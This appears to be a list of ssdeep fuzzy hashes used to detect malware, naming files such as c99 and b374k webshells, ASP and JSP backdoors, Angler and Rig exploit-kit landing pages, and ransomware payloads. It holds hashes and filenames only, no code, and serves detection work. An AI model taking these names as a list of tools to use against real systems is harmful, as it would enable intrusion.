+3072:CU4Sw2Q/pKQxJXDkIYLqkdrVUrqkIfmr6yTPOkIzrb3I:sp/xSIYL5dR8OkQ8,"body.384"
+3072:CU4Sw2Q/phG8j5jGa0KHW7UDiAOOV5m/4T69uyWYItab3B:sphG8j5jGAHW7vWYT1,"body.342"
+3072:CU4Sw2Q/pH1kUsfUrY5IRe86UVI1qI+lb3d:spH1kJ91qJR,"body.396"
+3072:CU4Sw2Q/p/h0eSa4NPLCzgYROSW/5BsUUrfvIkV5m/4W6dzyWDItdxb3U:spHSa4NPLCzgYROSeF/WDS4,"body.366"
+3072:CU4Sw2Q/pGw6SRhGZIUrqkIfW06mOUvnItzb36:spkSRgZI3vnam,"body.389"
+3072:CU4Sw2Q/pgG/bKdJY86wUDy6Olu2Pr6803pfSCIteb3s:spgG/bKdPe2MZfZdY,"body.339"
+3072:CU4Sw2Q/pfAdAh9rzn1Y8VziA3Ah9WSUzgrxrke8UrYkI9sWcr6g5vceI+qb3W:spfGCze8VziKXSUzgNmkWAceu6,"body.348"
+3072:CU4Sw2Q/peoQFyVbv7qUrfcIkHRRrcW6dQpfKaItZb3d:spMoqbRRrnfKa4Z,"body.361"
+3072:CU4Sw2Q/pED3bSXSu49esc5CUr5vI+F+668pfFItqb3i:spED3bSXSu4o5CgfFJ2,"body.387"
+3072:CU4Sw2Q/pdSQs9NjmIzIHS4Epb8UD0iOcF54/4W6DfwB2mIzMb3a:spdS9jmIzIHS4Epb8vB2mNm,"body.343"
+3072:CU4Sw2Q/pdJp4o0u+kIi+lJxuTgXvYeUrfvIb8QcT6xZx3S5IzTb3/:spOoT+lJxumv76QJ3S5Sj,"body.365"
+3072:CU4Sw2Q/pcyjy/UrYcIAWW6eyPOxqItMb3S:spcyjy/jOYhG,"body.378"
+3072:CU4Sw2Q/pbl4ljawDmyMWs5OmUr5cIdWW6WN6IknItMb3s:spblSKyMWs5OmHIOhQ,"body.395"
+3072:CU4Sw2Q/pbktgad77h7tkEqfyIPDC2UrqcI9sW6kTwBLIzdxb3R:spbktgadvZVqfyIPFuBL+d,"body.372"
+3072:CU4Sw2Q/p7S638+/NL8KAmiUrYvIAHRRrcT6McpfvI+4b3r:sp7S638+98KAmitRRrpfvEX,"body.355"
+3072:CU4Sw2Q/p5HA+/bJxvDRbSAC2UrfvINlk5VH/4T6yywBmIz8Wb3P:sp5HPbJxvDRGAC2RU+BmPWT,"body.358"
+3072:CU4Sw2Q/p52XpTErP7V4XNMUrqcIkHa59R/4W6UyI1P2IzZb37:sp4XpTE3V4XNMyGF1Oy/,"body.367"
+3072:CU4Sw2Q/p3Tk6hCm6jUrfvIxm065jvcxKItzb3o:spQ6hCm6jIcxKa0,"body.392"
+3072:CU4Sw2Q/p3j2sCqVTs90loDxUrYcIWHRRrc+6drrm4I+dxb3K:spz2sCuTs90mDxORRram47m,"body.368"
+3072:CU4Sw2Q/p2EecaI87UrYkIW1W6MVx3mI+qb3N:sp2IaXb3meJ,"body.383"
+3072:CU4Sw2Q/p1G8j5jGa0KHW7Urq5IW+5zm/9cr6W3yW1I+db3d:sp1G8j5jGAHW7UyLW1Zh,"body.345"
+3072:CU4Sw2Q/p19+G9BzNLMlUr55I1386c9UvihItE3b3B:sp19VBz+l/vih13d,"body.370"
+3072:CU4Sw2Q/p0uR0cInDGdUr5vIDHCi86lcvcMIt+b33:spEcInDGd3CZcMVj,"body.356"
+3072:CU4Sw2Q/p06E/E4Nm/UZ3JWJUrfvIVF54/4r6yM6IyIt8Wb3D:sp0xNbJmvIyDWf,"body.347"
+3072:cQuPKvlDgdhCNns5YionqlBevMqtBqaQkF2+u0uVXlm3AY:JuPKvlDgdhCNs5YionqlBevMqtBbQkF3,"DOC_ZIBSZXBIEG.php"
+3072:CQnLlnP4ZN3wJZWK2LhHvs8qjgl3BFRfPvpdyLtY63Vh:CQnLlwZNgJZWK2LhHvs8qjgHFRfPvpdQ,"Ak.txt"
+3072:cQLkTm9xMFR4xjMw1UcMi/njqBHS/fVWQooT+u0uVXlm3AU:cYkTm9xMFR4xjMw1UcMi/njqBHS/YQoR,"免杀php大马.php"
+3072:c//HFpcrp48IlKkYxm0Rq927L0ib4h9oR1BQh/VKDF30qmTFYkYrkzUVRR4:IfF848IlKkYA0U927L004h9i1BQh/VKW,"2016-03-04-pseudo-Darkleech-Angler-EK-landing-page-after-osakahockey.com-2-of-2.txt"
+3072:c//HFpcrp48IlKkYxm0Rq927L0ib4h9oR1BQh/VKDF30qmnFYkYrkzUVRR4:IfF848IlKkYA0U927L004h9i1BQh/VKq,"2016-03-04-pseudo-Darkleech-Angler-EK-landing-page-after-osakahockey.com-1-of-2.txt"
+3072:CG3LzFd3l73pgen0Ti0LzuEdvmEPG/Z7lX:CG3LHlOenGzTvmEPGx7lX,"ctt_sh.jpg"
+3072:C394YTxqV35Q9/cyaRUKGGgleJVN9qyRvzHok0/FPzDz3qHvtB3/6aiDzsjp8rEj:NpQ90zOXTYDbpzPjvfDm4LtnT,"草莓webshell.asp"
+3072:bxWLhSjGsOKL5JjXqduO5T6gjX88PgnyPfy:bxaEZOKL5JjXqxDT8XyPfy,"body.113.332"
+3072:brlpCshZiv5u06Q8gn0o+L7u5b2T5HmwfIivTxKeLSxwEgihF:Zhg5567o+vdZLA8xRLOwPA,"EFSO_2.asp"
+3072:bREIHcN0UHzyZr3rpPAY5W52qi1XN5x5/36RrS3PhyIvlgqLBB89wQUyk9Bs:zSze3vc619DE8ArEHQUr9Bs,"DarkBlade-v1.3-indexx.asp"
+3072:BbG33q/uLFjQbLO3UQe304bZOlR1DMMn4lwsbte2oE2zbz7FHMSRIK5x3fQ3Z+ap:BbG33q/uLFjQbLO3UQe304bZOlR1AU45,"gucu.txt"
+3072:BbA33qbQLFjQbLO3UQe304bZOlR1DMMn4lSsbte2oE2z7z7FHMSRIK5x3fQ4Z+ai:BbA33qbQLFjQbLO3UQe304bZOlR1AU4D,"mad02.jpg"
+3072:Bb+33qjRbLFjQbLO3UQe304bZOlR1DMMn4lwsbte2oE2aoz7FHMSRIK5x3fQ3Z+2:Bb+33qjRbLFjQbLO3UQe304bZOlR1AUC,"foto87.jpg"
+3072:AxdLBguZYmapBpwMXhkE7a3YjvJgnyPcy:AxN+uZijSMRDtyyPcy,"body.113.358"
+3072:AwDJAwr39F5NmT1a4e3/gIagoL7qkds+RhQ+Ym2lOmQxkfjV3B:1T,"ASPNETBackDoor.aspx"
+3072:aryQNmSkwqQPjZsd6W2RsDHZz204AtwMzZNVPLIRwQT+5n+xh/7ncPJmYho5AvO1:pMwQT+ZFvO9g2x,"jshell.jsp"
+3072:aryQNmSkwqQPjZsd6W2RsDHZz204AtwMzZNVPLIRwQT+5n+xh/7n0W/cF/cPJmYQ:pMwQT+ZjivO9g2x,"jshell.txt"
+3072:AN3AByLbThlA1TNi7dIl8HYtf1POuna10uVXlhDJR4/7sk03Z:AN3AcLbTnA1TNi7dIl8HYtf1POuna108,"Silic Group php Webshell v3.php"
+3072:aIRwAg3am6VEOvtc/upwE1EWX5nWEYtylapPtj+tiWe46KZ1Ve6VQnJ:1RTmaVc/uBxpnWt6U5LdKdin,"2016-03-29-followup-download-Locky-after-Nuclear-EK-payload-kicked-off-by-macfly-studio.com.exe"
+3072:AhfgomBLp/leL/aZUqh6daMf7JcHcmZm7D21rJQ8Mk5AYU6PYS1B+Pw2j5NpXSqk:AhfgTi8z/r1B+PnDpXNbJSEO,"Shell-v.2.5.php"
+3072:a8vIC3/W96yFmHMrcgcVRkpWquozzEBdPnFqH+NrNE:a8Re96yFmHMrcgcVRtquozzEBdPnFqeg,"国外免杀PHP大马_未翻译.php"
+3072:a8vIC3/W96yFmHMrcgcVRkpWquozzEBdPnFqH+9rNY:a8Re96yFmHMrcgcVRtquozzEBdPnFqeE,"国外免杀php大马.php"
+3072:a7OhQeDhtju95xPjzeLockUrLxPLxJKP2UgnvO:a7OKeDht4LUztPs2tnvO,"2016-03-02-pseudo-Darkleech-Angler-EK-landing-page-after-kiwitemplates.com.txt"
+3072:a7OhQeDhtju95xPjzeLockUrLxPLxd2UgnvO:a7OKeDht4LUztPL2tnvO,"2016-03-02-admedia-Angler-EK-landing-page-after-kiwitemplates.com.txt"
+3072:9xxLi8Xutpgagr+j+LwJ7W0GYU2ZJRb4Gvv4EWgnyPZy:9x53Xutpga3j+LwJ7W0zbfldyPZy,"body.113.329"
+3072:9wDJAwr39F5NmT1a4e3/gIagoL7qkds+RhQ+Ym2lOmQxkfjV3B:KT,"01.aspx"
+3072:9RQWW0i0+C0g2ph9WWn9Hk1jJawGBgEbweRXUAmjriWjtobRgYv/9Vj0kyV5KRxQ:c/E2ph9JELegEbrRXU9iWju91Vgms,"2015-009-Windows-Multi-Browser.zip"
+3072:9IYP8s6AmNI3ID4uz48r9/4+4PWkxQMLHn5Td5T5N:9IYP80mNkID4uz48r9/4+4PWkxQMLHnZ,"No-X-Team-Shell-New.php"
+3072:9huNgPCHJiEaqypMRiA+IM1Fux/x8w4FFAxDY0:9hwRpKdMRMTuxCwaFYY0,"c99_ud.php.txt"
+3072:9FITJTUnazOV3kD23hKKn35UhzEEDUT8gRANIwncc0:TITJ6kOV0SMc35KTg090,"Dark-mOon-MySQL-connector.php"
+3072:9afP6s6AmNI3IDNuz48r9/4+4PewxQMLHnDTd5T58:9afP60mNkIDNuz48r9/4+4PewxQMLHny,"c99_by_PSych0.v1.0.php.txt"
+3072:9afP6s6AmNI3IDeuz48rO/4+4PewxQMLHnpTd5T5b:9afP60mNkIDeuz48rO/4+4PewxQMLHnf,"c99shell-v1.0-build16-c2007shell.php"
+3072:8O6QYARwbXuBfYnZZ2Wr2K+x2+REQwzNEGPnoD1I718tx/:83QYARwbXutYZZ2Wr2KSREpzNEG3Qp,"R0XEM ShElL.php"
+3072:8MGhur0Jf7r2rSehFp7FsaXbBNHJp+HreH+6M50o:8N9GFp7FPrBNn+Mi,"2016-05-18-CryptXXX-ransomware.dll"
+3072:8MFIe/89THmfgzPtR1aVX9rsj9pqCB8a5ssc:8AIQ89HlzyuTfB8ajc,"nfm.php.php.txt"
+3072:8d99RMbFQ5l7ECLC0CMCXCRChCJC3CbCNCiCDnNS3OLYtQ6j47x43OSIiRAlMs/n:osQpy3OSIiEv2Eqe,"z1(1).txt"
+3072:86bJEo9faWbI82KyFmHMrsgcVnkpaqLboY/BUq1sVHzIlNW:1bJB9bFyFmHMrsgcVnhqLboY/BUq1sVD,"Acid_Shell-v1.php"
+3072:7ybKYoHtG0N+X8cxiGbkYANYLVQqMCeWt7chV83W37kQ:7ybKYYlNW8cxiGbkYANYLVQqMCeWt7cB,"VirusShare_32be9f8dd610865f9864d116eea756b3"
+3072:7YBDT2C2gNhDKrNituutTreuKBzj+GzvoZTOY7zukH5S:7YBD0gNVKrNituutTreuKBzSGzvoZTOB,"VirusShare_61f82f441bb3a9c735a2e9e4803cdb6e"
+3072:7xxqKoVwcNyg1dZiGbkYdMH4qDZLFh7C8We8Y937u:7xxqKfcNB1dZiGbkYdMH4qDZLFh7C8WT,"VirusShare_996b6331a36ed81b60fc1350ec0663c9"
+3072:7xtqKoVwcNyg1dZiGbkYdMH4qDZLFh7C8We8Y937u:7xtqKfcNB1dZiGbkYdMH4qDZLFh7C8WT,"VirusShare_ee1b29ac276deb255c2429f537b1fb1f"
+3072:7x1qKoVwkNyg1daiGbkYd0H4qDBLFh7C8We8Y937H:7x1qKfkNB1daiGbkYd0H4qDBLFh7C8WA,"c99.v1.0.php.txt"
+3072:7x1qKoVwcNyg1dZiGbkYdMH4qDZLFh7C8We8Y937u:7x1qKfcNB1dZiGbkYdMH4qDZLFh7C8WT,"c99.txt.2"
+3072:7x1qKo1wcNyg1dxiGbkYdMH4qDZLFh7C8We8Y9377:7x1qKdcNB1dxiGbkYdMH4qDZLFh7C8W0,"c99.txt.001"
+3072:7ugM/VXXzNrDarYituutTxmakBYRLzGovTgj7fQ2H57:7ugMZzNnarYituutTxmakBsLzGovTgjD,"c100.php"
+3072:7ugM/VXXzNrDarQituutTxmakBYRLzGovTgj7fQ2H5C:7ugMZzNnarQituutTxmakBsLzGovTgj6,"c100.txt"
+3072:+7TIkKfcMIhWW2Je4y/vSptTCh7Wh8jzxNYenp68OnuYrx:g6yhR2If3SpRCh7vjzxN7np/muYrx,"iskorpitx_shell.v1.0.php.txt"
+3072:7Q6vU3oUXNiDarHituutTxmakBIRDzGoiTzj7c5hH5D8:7Q6vMXNQarHituutTxmakBcDzGoiTzjF,"c100.txt.001"
+3072:7HITYoboiNxgTdCiGbkYWMH4UDfzhbCxWRlNr37Y:7HITYNiNeTdCiGbkYWMH4UDfzhbCxWRg,"c99.txt"
+3072:7dR2uoTa7NvgTdXiGbkYd0H4UD1qhDCcWD8F737D:7dR2uV7NoTdXiGbkYd0H4UD1qhDCcWDY,"c100_by_MeTaLTeaM.php.txt"
+3072:7Df2uoTajNvgTdGiGbkYdMH4UDBNhDCcWD8F7376:7Df2uVjNoTdGiGbkYdMH4UDBNhDCcWDt,"VirusShare_26fc3aa839a7bc5d496fa1a930cad2b9"
+3072:7aVvU9oeUNiDarpituutTOmakBsRSzGoiTzj7c5hH52:7aVvkUNQarpituutTOmakBISzGoiTzjT,"VirusShare_835ec56fd359c1c801aa1344177ba83d"
+3072:7aIvU3oUXNiDar9ituutTxmakBoRSzGoiTzj7c5hH5o:7aIvMXNQar9ituutTxmakB8SzGoiTzj7,"Shell [ci] .Biz was here.php"
+3072:7aIvU3oUPNiDar9ituutTrmakBWRSzGoiTzj7c5hH5p:7aIvMPNQar9ituutTrmakBGSzGoiTzjG,"Shell [ci] .Biz was here.php"
+3072:7ADSiPcGKN6DKr9ituutTJmaKB2RUzWotTb173dBH5R:7ADSwKNoKr9ituutTJmaKBmUzWotTb1v,"c99shell-v1.0-build16-Shadow.php"
+3072:7A+bbouBmNxgTdviGbkYdAH4UD7YhbCxWR96k37t:7A+bbfmNeTdviGbkYdAH4UD7YhbCxWR1,"c100_777shell_by_777.v1.0.php.txt"
+3072:7A9SiPcG+N6DKrHituutTxmaKBURUzWotTb173dt:7A9Sw+NoKrHituutTxmaKBwUzWotTb1j,"c99-corupt.php"
+3072:7A3SiPvG+N6Dar9ituutTxmaKBURUzWotTb17NrBH5n:7A3Sj+Noar9ituutTxmaKBwUzWotTb1t,"c99shell v. 1.0 pre-release build(safe-mode).php"
+3072:79DJYovkGNLg1dRiGbkYdKH4qD7jhfC7W7vnV37A:79DJYJGNE1dRiGbkYdKH4qD7jhfC7W7S,"c99_by_Shadow.v1.0.php.txt"
+3072:73BMKOp1SNgDarTituutT9makBRJMzGofTh97bxqH5Q:73BMhSNuarTituutT9makB3MzGofTh9n,"c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php"
+3072:720ccpkCuNgDarjituut7rmakBiRgzGofThj7r/7H54:720cYuNuarjituut7rmakBqgzGofThjy,"c99.txt"
+3072:720ccpkCGNgDarjituut7xmakBURgzGofThj7r/7H5k:720cYGNuarjituut7xmakBwgzGofThjK,"N3tshell-v.Emp3ror_Undetectable_18.php"
+3072:71WyWMSLhrp6rMWBdqKsJgUTqyiao38k70e:7MyWM+VsrM4qKcTNijr70e,"b374k-3.2.2.min.php"
+3072:6wCA/G6hjN09tARO7V8h4oAG1+p+fBAiIr8A28NaEi51vVo:6wCwG6hjm9tAQqSoASj5qr8A28N7i51y,"2016-04-04-Angler-EK-landing-page-after-womenshowesweb.net.txt"
+3072:6Tsm0RddSKViik3x+3LOslPzgiB4jRSBR5bL8rdi8/AlkKa0Ec67+RaUEInnirTB:6TBKVzy+bzbg6RbSdRAlkKT6XUEXj,"2016-06-26-Rig-EK-payload-Cerber-ransomware-after-southcoastdrones.com.au.exe"
+3072:6SZ7+51tPIriZbfs7FgqwhukKDudMXHjHwCpX1tztaHoqxXA651:1d+/twOlOFgqMByTXHjHFXz4w6z,"res7.txt"
+3072:6nLgu0zy4ZN3wJZnK2LhHvsVqjBa3BF2fP8pdTjeYb3d3:6nLg5dZNgJZnK2LhHvsVqjBMF2fP8pdZ,"wawalo.jpg.1"
+3072:6kzeS2koqwepQgzccw7EITXXfLiFb8DT1LxsKszWwP12+SdDHTdmPKM3b2:6kzIkoqwGQgzGEITXvwb8DT5xMjP1Gdx,"2016-05-24-EITest-Angler-EK-landing-page.txt"
+3072:6+hF64nITVkEQhNtra7qgIJsvArxl0BrlnURZYvoVgNXhlvQ/+Us2HKIacaUc22Z:Q0jso+rlURZqoVgXhs/DdDYuWXp,"2016-07-29-Magnitude-EK-payload-Cerber-both-runs.exe"
+3072:5x+RBUVDIUI43bThNYDb/VGfOHodgnSPJy:5x+KDo43bThNYDb/VGfCoySPJy,"body.114.009"
+3072:5xNSTRD+N6DKr9ituutTxmaKsgRAzWotTiHIvNSm:5xNS9+NoKr9ituutTxmaKsUAzWotTiH4,"c99_01_by_tristram.v1.0.php.txt"
+3072:5xNSTRD+N6DKr9ituutTxmaKsgRAzWotTiHIvNSC:5xNS9+NoKr9ituutTxmaKsUAzWotTiHM,"c99shell-v1.0-build17-w.php"
+3072:5VSlQrZBW9cyFmHMrsgcVFkpFqYuZYaBRqFjGHNo1uDNO:5YIk9cyFmHMrsgcVF2qYuZYaBRqFjGtO,"fx.txt"
+3072:5VSlQrZBW9cyFmHMrsgcVFkpFqYuZYaBRqFjGHNltKDNO:5YIk9cyFmHMrsgcVF2qYuZYaBRqFjGt/,"Fx29Sh-2.0.09.08.php"
+3072:5v0STg2+N6DKrUituutTxmaKsMRzzWotTiHcHtnm:5v0Sx+NoKrUituutTxmaKsozzWotTiHZ,"RedhatC99_by_redhat.v17.php.txt"
+3072:5rovFs3KN6DKrrituut0JmqKs8xkzWo2nidyaNScZ:ZovF4KNoKrrituut0JmqKsWkzWo2nidr,"c99_by_w4ck1ng.v1.0.php.txt"
+3072:5ros5s3+N6DKrrituut0xmqKs+xkzWo2nidyaNScB:Zos54+NoKrrituut0xmqKsgkzWo2nid7,"c99shell_w4cking-v0.3-2.php"
+3072:5PoZx0HKN3D67iituut0JmqKs9xkzWo2ni7yaJSJQ:FoZxEKNT67iituut0JmqKs/kzWo2ni7N,"c99_by_jos_ali_joe.v27.9.php.txt"
+3072:5mOpLqAdwmFdZMgmn6botrXZx5u8jy68OltBHtdGwRw4+EEB/V82MhAL+:wOpvMrVxXZxo8LbBtdG2w9B/22MhAy,"2016-05-18-pseudo-Darkleech-Angler-EK-landing-page.txt"
+3072:5fXWm5/C1MOe43PdLlbqqobgNdo2gwOeQA8cz+D5S/3RUX1pfV:NXMMOe43PfWqn1D87M/3RUX,"2017-03-07-EITest-Rig-EK-payload-Dreambot-ao82qwq9.exe"
+3072:5eoIYqi+N6Dn+4ituu1dtARns8xMzzWo2n5UVCNb:UoIYT+Non+4ituu1dtARnsWCzWo2n5Um,"SpecialShell_99.php.php.txt"
+3072:5BNHOMtsNDB5dhXaq5ZAXsBFp2QMhN1xXNBI21r3lZx4xOzq0EjIJZTZJ5VG4zwf:5BNHOMtsNLv5ZAXsBFp2QMhN1xE21r3E,"b374k-2.7.source.php"
+3072:5b6atzu9GH6QA3V57ex4hlWqLhnEYvp3672lteZ9tPNf89g+rz78E:5bhuv5i2hUq60A72lteZrNf87rz78E,"2016-03-17-other-Angler-EK-landing-page-after-localtasteblog.com.txt"
+3072:4zO0W4tCAWyYQDgzJqUysVgNl0I7vT14oS:4M4wTQczAUHOl0Ui/,"bypass.txt"
+3072:4xMEUv0nVBV4emCzxBjrxOwhsBq4JFgnSPsy:4xPUv0nF4YzxBjXs44JaSPsy,"body.113.137"
+3072:4QLaTm9xkFR4xjMw1UcMi/njqBHS/fVWQooT+a0uVXlm3AU:4YaTm9xkFR4xjMw1UcMi/njqBHS/YQot,"最新过安全狗- 免杀PHP大马 -.php"
+3072:4nomfu4pnsj8Kc0heMnni6bMfXsmKWseo1UQq4XOr9s7NSE9pGv4mDhz4mDQfWBU:4n76j8Eqs9z1q/shNAvDhz4mv3d5rQ,"2016-04-11-pseudo-Darkleech-Angler-EK-landing-page-after-condocosmetics.com.txt"
+3072:4nomfu4pnsj8Kc0heMnni6bMfXsmKWseo1UQq4XOr9s7NSE9pGv4mDhz4mDp3d5c:4n76j8Eqs9z1q/shNAvDhz4mt3d5rQ,"2016-04-13-pseudo-Darkleech-Angler-EK-landing-page-after-medical-library.net-second-run.txt"
+3072:4nomfu4pnsj8Kc0heMnni6bMfXsmKWseo1UQq4XOr9s7NSE9pGv4mDhz4mD8U3dW:4n76j8Eqs9z1q/shNAvDhz4mF3d5rQ,"2016-04-13-pseudo-Darkleech-Angler-EK-landing-page-after-medical-library.net-first-run.txt"
+3072:4m4RBUSrdp6vgDmVrgIojFdjpV2uiNv5PpFdj47g+/uMiBEDeenhEmPCTnLnBOT+:X,"2016-03-29-Locky-decrypt-instructions.bmp"
+3072:3wfYejIjqK2aqW/MH+IW5wy+4dlQq+OQ3sr4A8nsVw02MBYXDcP1E:3wgZjqK2rMMFfy+UlH9QcBw02YYXDUS,"Win32.Cutwail.zip"
+3072:3rw+G6t3JFCGHMszzDLfnxGwbg2/kfkN8LCo59e559c:3c635sszzDrxIc2xK9c,"2016-07-07-Neutrino-EK-payload-pizzacrypts.exe"
+3072:3RaKJ2gd7ltQ9nOxxOG0Vq8irvnEzp/WrvnEz:k02O5tQ9nOxx30VvKv4Gv,"2016-04-21-Rig-EK-malware-pyaload-Tofsee.exe"
+3072:3L/soSfNLg1d6X4i3AYA/wWHTgqKkfVG6wMHAr4pDeNhfCiWyrm98Vk:3LEJfNE1d6X4i3AYA/wWHTgqKkfVG6we,"VirusShare_aa6ec2f981c1a962277f93ea2765e5b3"
+3072:3KNrz2sNoZSPotsYkRFoZ4/IB5dhXwb5ZAPTsBTO2QMb6hNBqMhr3lYx4xOz7b0+:3KNrz2sNowuk75MC5ZAPTsBTO2QMb6gx,"b374k-2.7.source.txt.001.001.001"
+3072:3KNr+2sNoZSPotsYkRFoZ4/IB5dhXwb5ZAPTsBTO2QMb6hNBqMhr3lYx4xOz7b02:3KNr+2sNowuk75MC5ZAPTsBTO2QMb6gL,"b374k-2.8.source.php"
+3072:37e3OzZ5C20GbthNaMUCFCwZ42r4jMWts:37e3yZ5R0GbthNaRCFCwZSIR,"C99Shell v. 1.0 beta (5.02.2005).php"
+3072:32XFwdnyJ+pOFxrN5e5cFxsmRZVSxHYVVbYf3L2hg1h/rPJE:cwBQrZGmRZVSxEVQLJ1h/m,"syrian_sh3ll_by_EH_34G13.php.txt"
+3072:31e3OzZ5C20GbthNaMUCFCwZ42r4jMWts:31e3yZ5R0GbthNaRCFCwZSIR,"c99shell v. 1.0 beta (5.02.2005).php"
+3072:2xuLL+C+CP/RJ8SVx4WSDNShjVygnyPiy:2xC6MRJvsND0FyPiy,"body.113.336"
+3072:2xILYzg0+2vLDgURPFxGyv1BpW4QgnyPSy:2xAGg0+2vLDRPXlzp1yPSy,"body.113.350"
+3072:2Wfar1Xdr5XHX4uXJMcYIjIxSjgl/QoE9RHK7sar9vtr4Vy9wuJn:2WyhXdr5XHX4uXJMMQ/QR9gr9lr4U9w0,"g3.txt"
+3072:2rMkqJRrlgWJfaYiMMH2OoQKOBFIGhP/dKBMjQ6c:jxg8ONKOPN1KBML,"2016-06-28-Neutrino-EK-payload-gootkit-after-tonwyattwood.com.au.exe"
+3072:2bBpr6RjkNdy2z3qR4m2AFt5ptjcsYfHNWhcY4iJRMVx2MuLSqqRO3jn3EGzd0:2NIRm78zVFtRlitWhcjiknVueqoO3bUF,"Somoto.zip"
+3072:2/1CF0ctqfDmB6WCbgzJljYsc2RTYGodAqkqq:i1CFvt+aB6WogzJtYv2R8GodAqkqq,"2016-01-27-Angler-EK-landing-page.txt"
+3072:1+Y9eXWfk1HUxH7DLesRDTZ8+pcFgBha9ONk/Cfo65eDY/TzX8ZsHQvARxiT8Zjv:1+Y9eXWfk1HUxH7DLZRDL6m9cDTiY8y6,"c5f50debdbc5b4b6a1ec04e9f6705062_php.txt"
+3072:1Tc9EL6412umCAImqS3SrKYnfxa69zKXODbTaQj9r1eNGzA3lL3fP:1TDLrMurBnrK+K+DbmQZ1eNGUF3fP,"2016-03-24-pseudo-Darkleech-Angler-EK-landing-page-after-macfly-studio.com.txt"
+3072:1S0bp7j7hYK9t+tqDHPISoaIdoSQYb+m5S:Lbp7j7bN,"shell_decoded.asp"
+3072:1qb20LCr51jVt809M+F4pm3I1I7gmjM20LV:1qbFLCLBt8GRKpm3I1UMFLV,"2016-06-02-Rig-EK-payload-after-doc-italia.com.exe"
+3072:16zJco8QMm99GPQT+DRWXLy123WEIn8M+v4r71:1+Jv8QMm98v8XLNWuMyS71,"2016-05-25-pseudoDarkleech-Angler-EK-landing-page-second-run.txt"
+3072:16zJco8QMm99GPQT+DRWXLy123WEIn8M+tc4r71:1+Jv8QMm98v8XLNWuMycS71,"2016-05-26-Afraidgate-Angler-EK-landing-page.txt"
+3072:16zJco8QMm99GPQT+DRWXLy123WEIn8M+R4r71:1+Jv8QMm98v8XLNWuMYS71,"2016-05-25-Afraidgate-Angler-EK-landing-page-first-run.txt"
+3072:16zJco8QMm99GPQT+DRWXLy123WEIn8M+oe4r71:1+Jv8QMm98v8XLNWuMoS71,"2016-05-26-pseudoDarkleech-Angler-EK-landing-page.txt"
+3072:16zJco8QMm99GPQT+DRWXLy123WEIn8M+M4r71:1+Jv8QMm98v8XLNWuMRS71,"2016-05-25-Afraidgate-Angler-EK-landing-page-second-run.txt"
+3072:0x5LZ6O6Q6tGF8ueDsYn8lMen0zdgnyPEy:0xxWGFMDsYn8lNWyyPEy,"body.113.299"
+3072:0psfNFwiEaojJERgdBWmeDzo5pwt2yVixsb8w5fsWszkC:06fNFYaBidwmck5nxEXPC,"2016-03-24-post-infection-download-Locky-after-Nuclear-EK-infection.exe"
+3072:0goxT7eWGKQUKbq9DvRtzpJr9U0LNdkkK8fXbNg1+9QEeKJVQHoCZbdHubjD:0goZpQQRJS0HXK8fcyQErKIubdHk,"2016-04-18-EITest-Angler-EK-silverlight-exploit.xap"
+3072:099OOn6S3iVu+HNu5zkLlfMfmFLS6m59PaxMsxDIRCN7nIvo:OOhS3iVu+HY5zkLefmFLS6m59PEMs3ND,"Fx29Sh_by_FaTaLisTiCzFx.v3.2.php.txt"
+3:01P6DOvJxMG4MQnRx7AV9GA2017zA5HNLF822017zArHMAVCVhRR9HiLo:01Z4GAz7APGA2MnIZH2MnWjCVhRRULo,"w03.jsp"
+3:01P6DOvJxMG4MQnRx7AV9eXxVW2017zA5HNLFg1ZWGLnkzXkyD92017zA8smVW:01Z4GAz7API22MnIZEWGo5R2Mnrst,"w02.jsp"
+24:ZXz9DqexfUDD907uEyst6RWUnao9Mu/pIo92D9R1r:TDqeVUDD5sIwUnao5yow5,"inject06.php"
+24:ZxOj3Vf2n6on01Njwr9x+Iy6I8IQqAWOxME9Hx2BNdEaEyQtBf:ZxOxfI6o0j4JqZQKOxCBPEaE/tBf,"解包unpack.vbs"
+24:Zt9qPs9eqv5wtg33uE787ZZrIUUhqcwwEW8iEQ8uEiQAXy3Qe3I0ihKnyVN5:ZF2b0AZrEhqcDLt96AXHe3I0ihUa7,"cmd.c"
+24:Zs+RqdPQ8N3ufvWicEl4zT+oA39RHwHh4t:K7Q8Gdl4G537HwB4t,"cmfshell.cmf"
+24:ZoLTbd0B0WP/a+2MQygB1+HZTeUu6BVzCh0M6q9dUiDbmSfaEKv8MAZU/eSPqJWe:ZuTbuK+2Mn5RNu2Ch0M6qjU0bBfaEK0N,"d7701017bf039c4f8d3f2e2301881343_php.txt.orig"
+24:Zo9iOeDmualNsofuJ0OsTkagKhQ2FZYCq3u:ZmeDmuaDsmuJ0t8KGzCR,"def.php"
+24:znXYiujOdZUZa2MFRqyU8JmFFhfQCCmwZ4/8c8OG:zVuSrI9rthfQxZ4JNG,"2016-03-29-Locky-decrypt-instructions.txt"
+24:ZiarEb0AomZJ+Yo1Z6+W10Yxsh5FB4jDWPi15WCMNy:NrEQbrP4m8z/,"redirect2.php"
+24:ZhzTjhqZY71pqP7Oa6wDrrHC83cv/pD63KDQv:ZhzPhqQpY7Oafr32D1k,"redirect8.php.001.001"
+24:Zg1atEa20GWmpJ+Oo/Z6+w10O7s0o5rJFiWFsj5WCONbzXWZ:qMtE+FpQ8r2zj,"cond-sep28-redirect2.php"
+24:ZFjLD/XEJHhv05XEKzcN5B6JAEVN7I5IarfkGajEMAciWOgwdA3/:zj3EJH8XDsBeAy7I5Iar1ajKJWOgwc,"drupal-7-x-sqli.py"
+24:ZfeV4z54oMmRt2L1uav+QvsLeVMsv+UN1sVMbv+dugrl1DJNRvF+ly4SJo:ZGVFoa1ueVAV5xDzR74SC,"404.php.~169~"
+24:ZfeV4z54oMmRt2L1uav+QvsLeVMsv+UN1sJNMbv+dugrZz5OBRvF+Umyqg:ZGVFoa1ueVAz5xtz5OBRpZ,"404.php.~114~"
+24:ZfeV4z54oMmRt2L1uav+QvsLeVMsv+UN1sJNMbv+dugrZz5OBRvF+MDyqg:ZGVFoa1ueVAz5xtz5OBRzeZ,"404.php.~367~"
+24:ZfeV4z54oMmRt2L1uav+QvsLeVMsv+UN1sJNMbv+dugrZz5OBRvF+lyqg:ZGVFoa1ueVAz5xtz5OBR7Z,"404.php.~101~"
+24:ZfeV4z54oMmRt2L1uav+QvsLeVMsv+UN1DJNRvc+Ujy4SJo:ZGVFoa1ueVPzR74SC,"404.php.~138~"
+24:ZfeV4z54oMmRt2L1uav+QvsLeVMsv+UN1DJNRvc+8y4SJo:ZGVFoa1ueVPzR34SC,"404.php.~10~"
